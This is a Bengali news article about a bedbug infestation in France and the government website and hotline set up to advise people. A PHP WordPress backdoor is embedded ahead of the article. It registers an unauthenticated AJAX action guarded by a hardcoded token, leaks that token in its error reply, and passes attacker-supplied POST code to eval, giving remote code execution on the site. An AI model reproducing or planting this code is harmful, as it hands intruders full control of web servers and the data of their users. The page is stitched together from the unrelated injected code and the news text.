// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== ফ্রান্সে নতুন আতঙ্ক ছারপোকা!

ফ্রান্সে নতুন আতঙ্ক ছারপোকা!

চীন-সহ বেশ কয়েকটি দেশ যখন করোনাভাইরাসের আতঙ্কে কাঁপছে, তখন অন্য এক ভয়ে আছে ফরাসিদের। ফ্রান্স জুড়ে দেখা দিয়েছে ছারপোকার উপদ্রব। পরিস্থিতি এমন পর্যায়ে পৌঁছেছে, ওয়েবসাইট, হটলাইন খুলে প্রচার চালাতে হচ্ছে সরকারকে।

ওয়েবসাইট খোলার পাশাপাশি হটলাইন নম্বরে যোগাযোগ করতে পারেন মানুষ। সেখানে ছারপোকার সমস্যা এড়ানোর পন্থা বাতলে দেওয়া হচ্ছে সেই সঙ্গে পরামর্শ দেওয়া হচ্ছে কী করবেন, কী করবেন না।

ওয়েবসাইটে বলা হয়েছে, সবাই এই ছারপোকার দ্বারা আক্রান্ত হতে পারেন। এই ছারপোকাগুলি আপেলের বীজের আকারের। সিমেক্স লেক্টুলারিস নামে এই ছারপোকাগুলি অন্ধকার ভালবাসে। তাই বিছানা বা সোফার কোণেলুকিয়ে থাকে, সেখানেই বংশবিস্তার করে।
এই ছারপোকা এক রাত্রে ৯০ বার পর্যন্ত কামড়াতে পারে। আর এদের কামড়ের দাগ একদম মশার কামড়ানোর মতো। তাই দাগ দেখে মশা না ছারপোকা কী কামড়েছে বোঝা সম্ভব নয়।

এই ছারপোকা থেকে বাঁচার নানান পন্থা বাতলে দেওয়া হয়েছে। যেমন একবার পরার পর জামাকাপড় কম করে ৬০ ডিগ্রি সেলসিয়াসে ফোটাতে বলা হয়েছে। এর আগে ছারপোকার সমস্যায় ফরাসিরা জেরবার হয়েছিলেন ১৯৫০ সালে, তারপর এই ২০২০তে আবার শুরু হয়েছে।

এশিয়াবিডি/ ডেস্ক/ মুবিন

আরও সংবাদ